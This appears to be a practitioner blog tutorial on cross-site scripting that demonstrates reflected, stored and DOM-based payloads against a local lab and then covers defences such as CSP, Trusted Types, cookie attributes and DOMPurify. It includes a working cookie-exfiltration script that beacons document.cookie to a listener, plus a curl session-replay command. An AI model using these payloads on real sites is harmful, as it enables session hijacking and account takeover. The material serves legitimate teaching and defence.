TechEarl

Cross-Site Scripting (XSS): The Complete 2026 Practitioner Guide

Cross-site scripting deep dive: three variants (reflected, stored, DOM), the cookie-theft chain end to end, and the modern defences (CSP, Trusted Types, HttpOnly, framework auto-escaping) that actually move the needle.

Ishan Karunaratne⏱️ 25 min readUpdated
Share thisCopied
Cross-site scripting variants, exploitation, and modern defences explained end to end

Cross-site scripting is the second class on the web application security vulnerabilities map and the one I find most often after SQL injection. It is catalogued as CWE-79 and folded into A03 Injection in the OWASP Top 10 since the 2021 revision. The mechanism is older than jQuery, the defences are now mature, and the bug is still everywhere because the surface keeps growing: every new rendering layer (server templates, then client-side frameworks, then component islands, then streaming partials) ships its own escape hatches and its own footguns.

This article is the deep dive that sits next to the SQL injection guide under the same security hub. I cover the three variants (reflected, stored, DOM) with reproducible exploits against a small Dockerised lab, walk the cookie-theft chain end to end including the modern routes that sidestep HttpOnly, then turn around and cover the defences (CSP, Trusted Types, secure cookie attributes, framework auto-escaping, DOMPurify) in equal depth.

In short: what is cross-site scripting?

Cross-site scripting (XSS) is what happens when an application returns user-controlled data into a page in a context where the browser parses it as code instead of as text. The attacker's input lands in a victim's browser as executable JavaScript with the victim's origin, the victim's cookies, and the victim's session. From there it can read the DOM, exfiltrate session tokens, make authenticated requests to the application's API, rewrite the page to phish credentials, or pivot to install a persistent payload via a service worker. The three classical variants are reflected (payload echoed from the current request), stored (payload saved to the database and rendered to every subsequent viewer), and DOM-based (payload never touches the server because the sink is in client-side JavaScript). XSS still matters in 2026 because framework auto-escaping closed the easy reflected cases but the surface moved into client-side rendering, into rich-text editors, into iframe sandboxes leaking back into parents, and into the dangerouslySetInnerHTML / v-html / bypassSecurityTrustHtml escape hatches that every modern UI framework ships and every product eventually reaches for.

What is XSS, mechanically?

XSS is a parser-confusion bug, identical in shape to SQL injection but with the browser's HTML/JS parser as the target instead of the database's SQL parser. The application emits a response that mixes developer-authored markup with user-supplied data. The browser parses the whole response as HTML. Any user-supplied bytes that happen to look like HTML (<script>, <img onerror=...>, javascript: URLs in href, event-handler attributes, <svg> with embedded JS) get parsed as HTML and executed as such.

The canonical vulnerable code, in PHP, is:

php
$q = $_GET['q'];
echo "<h2>Results for: $q</h2>";

A normal request is ?q=node, producing <h2>Results for: node</h2>. An attacker request is ?q=<script>alert(1)</script>, producing <h2>Results for: <script>alert(1)</script></h2>. The browser sees a script tag, executes it, and the box pops.

That is the entire mechanism. Every variant below is a different answer to the question "where did the user input come from, and when does the browser see it?".

A note on OWASP Top 10 placement

XSS used to be its own category in the OWASP Top 10 (A7 in 2017). In the 2021 revision, XSS was merged into A03 Injection alongside SQL injection and the rest of the injection family, because the underlying mistake (untrusted input parsed as code in an interpreter) is the same across all of them. The category move is not a downgrade of the risk; it is a recognition that the mental model is shared.

The vulnerable app I am attacking

For every example below, assume a minimal PHP/MySQL app with three intentionally-vulnerable rendering sinks and one deliberately misconfigured session cookie:

  • GET /search.php?q=<query> reflects q into the page's <h2> heading without escaping.
  • GET /guestbook.php (authenticated) accepts comments, stores them, and renders every comment body raw to every subsequent viewer. The admin dashboard at /admin.php reads the same comments, so a payload posted by a regular user fires inside an admin's session when the admin visits.
  • GET /share.php#<payload> reads location.hash in inline JavaScript and writes it into the DOM via innerHTML. The fragment never touches the server.
  • The session cookie session_id is set without HttpOnly, Secure, or SameSite, so document.cookie can read it from any of the three sinks.

A Docker target with this exact API lives in the techearl-labs companion repo at cross-site-scripting/xss-basic: docker compose up xss-basic and hit http://localhost:8081. All payloads below are reproducible against that target.

Variant 1: reflected XSS

Reflected XSS is the simplest variant. The payload lives in the current request (query string, form body, header), the server reflects it into the response, the browser parses the response and executes it. The attacker delivers the payload by getting a victim to click a crafted link (phishing email, malicious tweet, ad link, link in a forum post).

The vulnerable code is the PHP snippet above. The exploit against the lab:

code
http://localhost:8081/search.php?q=<script>alert(1)</script>

The q parameter is interpolated into <h2>Results for: $q</h2> with no escaping. The browser parses the resulting HTML, sees a real <script> element, executes its contents, and alert(1) runs. No login required, no persistence: the payload only fires for whoever clicks the link.

Reflected XSS used to be the dominant variant a decade ago because server-rendered apps with raw string interpolation were the norm. Modern templating engines (Twig, Jinja, ERB, Blade, JSX) auto-escape by default, which has pushed reflected XSS into a smaller surface: search result pages with custom highlighting, error pages that echo the failing parameter, redirect handlers that put a next URL in the body, anywhere an engineer reached for {{ raw }} or dangerouslySetInnerHTML to render "trusted" markup that turned out not to be.

Real incident: the Samy worm (October 2005) started as reflected-and-stored XSS on MySpace's profile editor. Samy Kamkar bypassed MySpace's filter (which blocked <script> and javascript:) by smuggling JS into a CSS expression() and a fragmented java\nscript: URL. The payload added Samy as a friend and copied itself into the victim's profile. Around one million MySpace accounts were infected in roughly twenty hours before the site was taken offline. It is the canonical worked example of "filtering is not parameterisation".

Variant 2: stored XSS

Stored XSS (also called persistent XSS) saves the payload server-side and serves it back to every viewer. The attacker submits the payload once; every subsequent page load by every user becomes the trigger. No phishing required, no per-victim click. This is the variant that actually scales.

The vulnerable code in the lab is the guestbook handler:

php
$stmt = $pdo->prepare("INSERT INTO comments (user_id, body) VALUES (?, ?)");
$stmt->execute([$_SESSION['user_id'], $_POST['body']]);

// later, on render:
foreach ($comments as $c) {
    echo "<div class='comment'>{$c['body']}</div>";
}

The insert is parameterised (no SQL injection), and the developer told themselves the database is the trust boundary. It is not. The string was attacker-supplied; storing it safely does not sanitise it. The rendering step concatenates it back into HTML and the browser parses it as HTML.

The exploit against the lab:

  1. Sign in as alice at http://localhost:8081/login.php (password alice123).
  2. Open http://localhost:8081/guestbook.php and post a comment with the body <script>alert(1)</script>.
  3. Reload any page that renders the guestbook (/, /guestbook.php, /admin.php). The script fires in every visitor's browser, including the admin's.

Stored XSS is the variant that powered most of the high-profile XSS incidents: the Samy worm copying itself into MySpace profiles; the TweetDeck self-retweeting XSS (June 2014) where a <script> tag in a tweet ran inside other users' TweetDeck clients on render; long-running stored XSS in eBay listing descriptions throughout the mid-2010s. Wherever user-generated content is rendered to other users (comments, reviews, profiles, ticket descriptions, error reports, support chat history), stored XSS is the dominant risk.

Variant 3: DOM-based XSS

DOM-based XSS lives entirely in the browser. The payload never reaches the server (or, if it does, the server does not reflect it). The vulnerability is a client-side JavaScript sink that reads a source the attacker controls (location.hash, location.search, document.referrer, window.name, postMessage data, localStorage) and writes it into the DOM via a sink that parses HTML (innerHTML, outerHTML, document.write, insertAdjacentHTML, jQuery's $(...) with an HTML string, eval, the Function constructor, setTimeout with a string argument).

The vulnerable code in the lab's share.php:

html
<div id="target"></div>
<script>
    document.getElementById('target').innerHTML = location.hash.slice(1);
</script>

The exploit:

code
http://localhost:8081/share.php#<img src=x onerror=alert(1)>

Two details matter here. First, the fragment (#...) is never sent to the server, so server-side logs and WAFs do not see the payload. Second, you cannot use a plain <script> tag inside innerHTML: the HTML spec requires the parser to skip script execution for content inserted this way. Use a tag that triggers script via an event handler instead (<img onerror>, <svg onload>, <iframe srcdoc>, <input autofocus onfocus>).

DOM XSS has become the dominant variant in modern single-page apps because the server is now mostly a JSON API and the rendering layer has moved client-side. Every framework's HTML-rendering escape hatch (dangerouslySetInnerHTML in React, v-html in Vue, bypassSecurityTrustHtml in Angular, {@html} in Svelte) is a DOM XSS waiting to happen if anyone passes user-controlled data through it. Same for any code that builds a URL from input and assigns it to <a href> without checking the scheme: a javascript:alert(1) URL is a working XSS payload.

How do attackers steal cookies with XSS?

The classic XSS-to-session-hijack chain has four steps:

  1. Land an XSS payload in the victim's browser (any of the three variants above).
  2. From inside that payload, read the session cookie via document.cookie.
  3. Exfiltrate it to an attacker-controlled host (image beacon, fetch, navigator.sendBeacon, new Image().src=...).
  4. Replay the captured cookie value in a fresh browser or via curl -b 'session_id=...'. The application sees the request as the victim and renders the victim's pages.

End-to-end against the lab:

html
<script>new Image().src='http://localhost:9000/c?'+document.cookie</script>

Posted as a guestbook comment by alice, this fires in every viewer's browser. When the admin loads /admin.php, the payload runs in the admin's session, reads the admin's session_id from document.cookie, and triggers a GET to the attacker's listener (python3 -m http.server 9000 is enough for the demo). The query string of that request contains the admin's session ID. Replay it:

bash
curl -b 'session_id=<stolen-value>' http://localhost:8081/admin.php

The admin dashboard renders. The hijack is complete.

The primary defence at the cookie layer is the HttpOnly attribute, set when the application emits the Set-Cookie header. HttpOnly tells the browser to expose the cookie to HTTP requests but not to JavaScript: document.cookie returns an empty string for HttpOnly cookies. With HttpOnly, the step-two read in the chain above fails, and a clean XSS payload cannot steal the session token directly. HttpOnly was introduced by Microsoft in Internet Explorer 6 SP1 in 2002 and is supported by every major browser today; there is no excuse for shipping a session cookie without it.

HttpOnly is necessary but not sufficient. Two modern routes sidestep it entirely:

  • Adversary-in-the-middle phishing (AiTM). Tools like Evilginx act as a reverse proxy in front of the real login page. The victim authenticates against the real site through the proxy, completes MFA, and the proxy captures the response Set-Cookie header before passing it through. The attacker now has the session cookie without ever needing JavaScript inside the victim's browser. HttpOnly is irrelevant: the proxy sits in front of the HTTP exchange, not inside the browser.
  • Infostealer malware. Off-the-shelf infostealer families (RedLine, Vidar, Raccoon, Lumma) walk the browser's cookie store on disk and exfiltrate every session cookie for every site the victim has signed into. The malware reads the cookie database directly from the filesystem; HttpOnly is, again, a browser-internal flag and does not affect on-disk encryption (which on most platforms uses a key the user's own processes can derive).

The point is that HttpOnly blocks the in-browser script-reads-cookie path, which is the only path you control as the application owner. It does not block out-of-band session theft. The defence against the modern routes is at a different layer: phishing-resistant MFA (WebAuthn, hardware keys), short-lived session tokens, IP and device binding, and re-authentication for sensitive operations.

There are also XSS-driven session abuses that do not need document.cookie at all. If the cookie has HttpOnly set, the script cannot read it, but the browser will still send it on every same-origin request the script makes. The XSS payload can call the application's own API directly with fetch('/api/admin/transfer', { method: 'POST', credentials: 'include', body: ... }), ride the session, and act as the victim without ever exfiltrating the token. HttpOnly is a defence against token theft, not a defence against authenticated request forgery from inside the page. CSRF tokens do not help here either, because the same XSS can read the CSRF token straight from the DOM.

Walking three working chains against the lab

The full lab walkthrough lives in the README at techearl-labs/cross-site-scripting/xss-basic. The three minimal reproducers, one per variant.

Reflected XSS

bash
# Confirm the sink reflects raw HTML:
curl -s 'http://localhost:8081/search.php?q=<x>' | grep 'Results for'

Expected output contains Results for: <x> (literal, not entity-escaped). Then in a browser:

code
http://localhost:8081/search.php?q=<script>alert(1)</script>

The alert fires. Replace the payload with the cookie-exfil snippet from the previous section to capture the session of whoever clicks the link.

Stored XSS

Sign in as alice, post <script>alert(1)</script> to the guestbook, sign out, then load the landing page in any browser session. The alert fires for every visitor. To target the admin specifically, post the cookie-exfil payload and wait for an admin to load /admin.php; that page reads the same comment stream.

DOM XSS

code
http://localhost:8081/share.php#<img src=x onerror=alert(1)>

No login, no server logs of the payload, no WAF visibility. The fragment is delivered through the URL, read by inline JavaScript, and rendered through innerHTML. The <img onerror> form is required because innerHTML will not execute a plain <script> tag.

Modern defences

Content Security Policy

A Content-Security-Policy (CSP) response header tells the browser which sources of script, style, image, frame, and other resources the page is allowed to load and execute. A strict CSP prevents arbitrary <script> tags injected via XSS from running at all, because the script source will not be on the allow-list and inline scripts will be refused unless they carry a matching nonce or hash. Full reference at MDN's CSP page.

A realistic strict policy for a modern app:

code
Content-Security-Policy:
  default-src 'self';
  script-src 'self' 'nonce-r4nd0m' 'strict-dynamic';
  style-src 'self' 'unsafe-inline';
  img-src 'self' data: https://images.example.com;
  connect-src 'self' https://api.example.com;
  frame-ancestors 'none';
  base-uri 'none';
  object-src 'none';
  form-action 'self';

The nonce-r4nd0m value is a per-response random string the server emits in both the CSP header and on every legitimate <script nonce="r4nd0m"> tag. An injected script without the nonce will not run. 'strict-dynamic' lets scripts loaded with a valid nonce load further scripts they need, so the policy does not require a giant allow-list of every CDN.

Two practical notes. First, CSP is enforced by the browser, so it is defence in depth: if your app has zero XSS bugs, CSP changes nothing; if your app has one XSS bug, CSP can turn it from a working exploit into a console warning. Second, getting from no-CSP to strict-CSP on a real app is a multi-week project because every inline event handler (onclick="..."), every inline style attribute, and every third-party script must move to nonces or external files. Start with Content-Security-Policy-Report-Only to see what would break, then promote.

Trusted Types

Trusted Types is a browser API that makes the dangerous DOM sinks (innerHTML, document.write, eval, setTimeout(string, ...)) refuse to accept plain strings and only accept "trusted" objects created by a named policy. Documented in web.dev's Trusted Types guide. The effect is that DOM XSS becomes impossible by construction in code paths that go through those sinks, because there is no way for an attacker-controlled string to reach them.

Enable it via CSP:

code
Content-Security-Policy: require-trusted-types-for 'script'; trusted-types default;

Then in application code, every assignment to innerHTML (or equivalent sink) has to route through a policy:

javascript
const policy = trustedTypes.createPolicy('default', {
    createHTML: (input) => DOMPurify.sanitize(input),
});

element.innerHTML = policy.createHTML(userInput);

A raw string assignment (element.innerHTML = userInput) now throws a TypeError instead of silently rendering an attacker payload. Trusted Types is supported in Chromium-based browsers (Chrome, Edge) as a fully shipped feature; Firefox and Safari have partial or behind-flag support as of 2026 (verify current shipping status against MDN before relying on it). For Safari and Firefox users, Trusted Types is a no-op: the sinks accept strings as they always did. That means Trusted Types is meaningful as a defence-in-depth layer for the Chromium share of your traffic and as a forcing function for clean code patterns across the whole codebase. It is not a single browser-portable defence on its own.

The three attributes that every session cookie must carry, every time:

code
Set-Cookie: session_id=<value>; HttpOnly; Secure; SameSite=Lax; Path=/
  • HttpOnly prevents document.cookie reads from JavaScript. Discussed above.
  • Secure prevents the cookie from being sent over plain HTTP. With HSTS in place the practical risk is low, but cost is zero and the attribute is correct on principle.
  • SameSite=Lax prevents the cookie from being sent on cross-site subresource requests, which is the underlying defence against CSRF. Chrome made SameSite=Lax the default for unmarked cookies in February 2020; Firefox followed in 2021. Explicit is better than relying on the default.

For a cookie that genuinely needs to flow on cross-site top-level navigations (a few federated-login flows), SameSite=None; Secure is the correct setting. Anything else should be Lax or Strict.

Framework auto-escaping

The single largest win against XSS in the last decade is framework defaults. React, Angular, Vue, Svelte, and modern server-side template engines all auto-escape interpolations in their default rendering path:

jsx
// React, safe by default:
<h2>Results for: {query}</h2>

query is rendered as text, not HTML. <script> in the value renders as literal text on the page. To opt out, you have to reach for dangerouslySetInnerHTML in React, v-html in Vue, bypassSecurityTrustHtml in Angular, {@html} in Svelte, or |safe in Jinja. Those are the escape hatches, and they are where XSS lives in modern code:

jsx
// React, unsafe if `query` is user-controlled:
<h2 dangerouslySetInnerHTML={{ __html: `Results for: ${query}` }} />

If you find one of these calls in a code review, that is the starting point for the XSS audit. The name dangerouslySetInnerHTML was chosen deliberately; treat it as a warning.

Two caveats on framework auto-escaping. First, it only protects the interpolation step, not the URL-attribute step: <a href={userUrl}> will happily render javascript:alert(1) because the framework cannot tell whether you meant an HTTP URL or a JS URL. Validate URL schemes before interpolation. Second, server-side rendering (Next.js, Nuxt, Remix) shares the same auto-escape, but the same escape hatches exist server-side and are easier to overlook because the "it is just a string" feeling is stronger.

DOMPurify for unavoidable user HTML

Some products genuinely need to render attacker-shaped HTML: a rich-text editor where users post formatted comments, a markdown renderer with embedded HTML, a feed reader pulling third-party RSS. For those, sanitise with DOMPurify before injecting. DOMPurify parses the HTML in a sandboxed document, walks the resulting tree, and strips every element, attribute, and URL scheme not on its allow-list. It is the only sanitiser I trust in production.

javascript
import DOMPurify from 'dompurify';

element.innerHTML = DOMPurify.sanitize(userHtml, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br', 'ul', 'ol', 'li', 'code', 'pre'],
    ALLOWED_ATTR: ['href'],
    ALLOWED_URI_REGEXP: /^(?:(?:https?|mailto):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i,
});

Pair it with Trusted Types where you have a Chromium audience: the DOMPurify policy becomes the only path that produces the trusted object, and every other path throws.

Real-world incidents

A short tour of XSS in production. I have deliberately limited each to claims I am confident about; for the version-specific or CVSS-specific details, verify against the linked advisory before quoting.

  • Samy worm, MySpace (October 2005). Stored XSS in profile-page HTML that bypassed MySpace's javascript: and <script> filter via CSS expression() and a fragmented java\nscript: URL. Samy Kamkar's payload added the worm author as a friend and copied itself into the victim's profile, propagating roughly a million friend requests in about twenty hours before MySpace took the site down. The canonical example of "blacklist filtering is not parameterisation".
  • TweetDeck stored XSS (June 2014). A <script> tag posted in a tweet rendered without escaping inside TweetDeck's web client, popping for any TweetDeck user who saw the tweet in their timeline. A retweet-on-load payload propagated for hours before Twitter pushed a fix and forced a logout.
  • British Airways formjacking (August/September 2018). A Magecart-style supply-chain compromise modified a JavaScript file BA loaded on its payment pages, exfiltrating about 380,000 cards and personal records to an attacker-controlled domain. The ICO fined BA £20 million in 2020 (reduced from an initial proposed £183m). Not classical XSS, but the underlying primitive (attacker-controlled JavaScript running in the application's origin) is identical, and the case is the strongest argument for strict CSP with a tight connect-src allow-list: BA's browser would not have been able to POST to the attacker's domain if it had been blocked at the CSP layer.
  • Fortinet FortiSIEM XSS (CVE-2023-34985 et al.). Stored XSS in administrative interfaces of security-product management consoles is a recurring class. Every major security vendor has shipped one; treat security-product UIs with the same XSS scrutiny as anything else.
  • Generic CVE pattern: rich-text editor sinks. Search the CVE database for "XSS" and any popular WYSIWYG editor (TinyMCE, CKEditor, Quill, Slate). New entries appear several times a year. Rich-text editors are the highest-density XSS surface in modern apps because they exist specifically to render attacker-shaped HTML.

For the per-CVE details (affected versions, CVSS, patch availability), pull the entry from nvd.nist.gov or the vendor advisory at the time of writing; version-specific claims age fast, and I would rather link out than risk a stale number.

Common defence mistakes I still see

  1. Blacklist filtering of <script> and javascript:. The Samy worm broke this pattern in 2005 and it has been broken in the same ways ever since: case-changes, encoding, line breaks inside the keyword, alternative tags (<svg>, <math>, <details ontoggle>), data: URLs, javascript&#58;. Use a sanitiser that parses HTML and applies an allow-list, or do not let raw HTML reach the renderer at all.
  2. Trusting Content-Type: application/json to prevent XSS. A JSON endpoint that reflects user input can still be XSS if a browser sniffs it as HTML (older browsers) or if the response is loaded into a context that parses HTML (a fetch followed by innerHTML, a <script src> to a JSONP endpoint). Send X-Content-Type-Options: nosniff on every response and never put user input directly into a JSONP callback name.
  3. Trusting HttpOnly to stop session theft. HttpOnly blocks document.cookie reads from the page. It does not stop XSS from making authenticated requests via the browser's automatic cookie attachment, does not stop AiTM phishing, and does not stop infostealer malware reading the cookie store off disk. HttpOnly is necessary; it is not the whole story.
  4. CSP with 'unsafe-inline' in script-src. This is the default many teams ship to make migration painless. It also makes the CSP useless for XSS: any injected <script> tag executes, because inline script is allowed. The whole point of CSP for XSS defence is the nonce or hash gate. Remove 'unsafe-inline' from script-src or do not bother.
  5. Sanitising on input instead of on output. Sanitising at the input boundary feels safe and produces silently-broken behaviour for a year before someone notices that the database is full of mangled content. Sanitise (or escape) at the output boundary, in the encoding appropriate to that context: HTML body, HTML attribute, JavaScript string, URL parameter, CSS. The contexts have different escape rules; the OWASP Cross Site Scripting Prevention Cheat Sheet lists them.
  6. WAF as the only defence. Mod_security with the OWASP CRS will catch the obvious payloads and slow opportunistic scanning. It will not catch stored XSS where the payload was injected long before it was rendered, will not catch DOM XSS (the payload never reaches the WAF), and will not catch novel encodings. WAF is one layer.
  7. Assuming React/Angular/Vue makes you safe. They make the default path safe, which is where most code lives, but dangerouslySetInnerHTML, bypassSecurityTrustHtml, v-html, {@html}, and any URL-attribute interpolation are still vulnerable. Grep for the escape hatches and audit each call site.

Where to go next

The XSS cluster fans out from this hub the same way the SQL injection cluster does. The deeper variant article on cookie theft and session hijack will live at /xss-stealing-session-cookies with the full Evilginx and infostealer walkthroughs. The tools listicle will live at /best-xss-tools-2026 covering DOMPurify, the OWASP ZAP DOM scanner, XSStrike, BeEF, and the manual workflow.

For the wider map, back up to the web application security vulnerabilities taxonomy. For the sister variant that uses the same code/data confusion pattern at the database layer, the SQL injection deep dive is the closest analogue: same mistake, different interpreter, same shape of defence.

Sources

Authoritative references this article was fact-checked against.

TagsXSSCross-Site ScriptingSecurityWeb SecurityOWASPCSPCookie Security

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

Keep reading

Related posts